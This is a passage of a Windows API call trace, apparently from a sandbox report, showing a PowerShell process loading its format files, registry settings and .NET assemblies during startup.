	[0334.092] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0xaca, lpOverlapped=0x0) returned 1
	[0334.092] ReadFile (in: hFile=0x308, lpBuffer=0x34bedfa, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bedfa*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0334.092] ReadFile (in: hFile=0x308, lpBuffer=0x34bf7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x34bf7c8*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0334.093] CloseHandle (hObject=0x308) returned 1
	[0334.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0334.093] SetErrorMode (uMode=0x1) returned 0x1
	[0334.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0334.093] SetErrorMode (uMode=0x1) returned 0x1
	[0334.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0334.093] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x308) returned 0x0
	[0334.093] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0334.094] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ff180
	[0334.094] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x1b8ff180, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0334.094] CoTaskMemFree (pv=0x1b8ff180) 
	[0334.094] RegCloseKey (hKey=0x308) returned 0x0
	[0334.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0334.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0334.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0334.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0334.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0334.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0334.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0334.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0334.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0334.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0334.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0334.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0334.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0334.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0334.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0334.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0334.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0334.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0334.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0334.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0334.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0334.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0334.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0334.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0334.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.384] VirtualQuery (in: lpAddress=0x26b9e0, lpBuffer=0x26c8a0, dwLength=0x30 | out: lpBuffer=0x26c8a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.384] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4132fe14, Data2=0xf74d, Data3=0x4d4b, Data4=([0]=0x97, [1]=0xfa, [2]=0x7a, [3]=0x8b, [4]=0xdc, [5]=0xc8, [6]=0xed, [7]=0x8))) returned 0x0
	[0335.385] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x83996ff4, Data2=0x78f1, Data3=0x4271, Data4=([0]=0xa6, [1]=0x35, [2]=0x1a, [3]=0x72, [4]=0x9f, [5]=0x6c, [6]=0x9b, [7]=0xb))) returned 0x0
	[0335.386] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.386] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.388] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x195412de, Data2=0x14f2, Data3=0x41f3, Data4=([0]=0x8d, [1]=0xa2, [2]=0x4b, [3]=0xf4, [4]=0x1a, [5]=0x53, [6]=0x1f, [7]=0x74))) returned 0x0
	[0335.390] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5262d533, Data2=0x87b, Data3=0x43c6, Data4=([0]=0x93, [1]=0xf0, [2]=0x5e, [3]=0x6c, [4]=0x84, [5]=0x12, [6]=0xba, [7]=0x4f))) returned 0x0
	[0335.391] VirtualQuery (in: lpAddress=0x26bde0, lpBuffer=0x26cca0, dwLength=0x30 | out: lpBuffer=0x26cca0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.391] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.392] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.392] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x9a8147fb, Data2=0xaae, Data3=0x40c1, Data4=([0]=0xb7, [1]=0x2b, [2]=0xf6, [3]=0x33, [4]=0x1b, [5]=0x22, [6]=0x5b, [7]=0x3d))) returned 0x0
	[0335.392] VirtualQuery (in: lpAddress=0x26bde0, lpBuffer=0x26cca0, dwLength=0x30 | out: lpBuffer=0x26cca0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.393] VirtualQuery (in: lpAddress=0x26bc00, lpBuffer=0x26cac0, dwLength=0x30 | out: lpBuffer=0x26cac0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.393] VirtualQuery (in: lpAddress=0x26b450, lpBuffer=0x26c310, dwLength=0x30 | out: lpBuffer=0x26c310*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.393] VirtualQuery (in: lpAddress=0x26b450, lpBuffer=0x26c310, dwLength=0x30 | out: lpBuffer=0x26c310*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.393] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x630752ba, Data2=0xe5ea, Data3=0x434b, Data4=([0]=0x80, [1]=0x81, [2]=0x20, [3]=0x78, [4]=0xaa, [5]=0x71, [6]=0xf, [7]=0x83))) returned 0x0
	[0335.393] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xf46fa6c4, Data2=0x7a3f, Data3=0x4f72, Data4=([0]=0xad, [1]=0xc7, [2]=0x47, [3]=0xb7, [4]=0x71, [5]=0x6b, [6]=0xdc, [7]=0xb))) returned 0x0
	[0335.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0335.394] SetErrorMode (uMode=0x1) returned 0x1
	[0335.394] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0335.394] GetFileType (hFile=0x308) returned 0x1
	[0335.394] SetErrorMode (uMode=0x1) returned 0x1
	[0335.394] GetFileType (hFile=0x308) returned 0x1
	[0335.394] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.396] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.396] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.396] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.397] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.397] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.397] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.397] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.398] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.398] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.398] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.398] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.399] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.399] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.399] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.399] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.400] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.400] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0xbce, lpOverlapped=0x0) returned 1
	[0335.400] ReadFile (in: hFile=0x308, lpBuffer=0x35714f6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x35714f6*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0335.401] ReadFile (in: hFile=0x308, lpBuffer=0x3571dc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x3571dc0*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0335.401] CloseHandle (hObject=0x308) returned 1
	[0335.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0335.401] SetErrorMode (uMode=0x1) returned 0x1
	[0335.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0335.401] SetErrorMode (uMode=0x1) returned 0x1
	[0335.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0335.401] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x308) returned 0x0
	[0335.401] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0335.401] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ff500
	[0335.401] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x1b8ff500, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
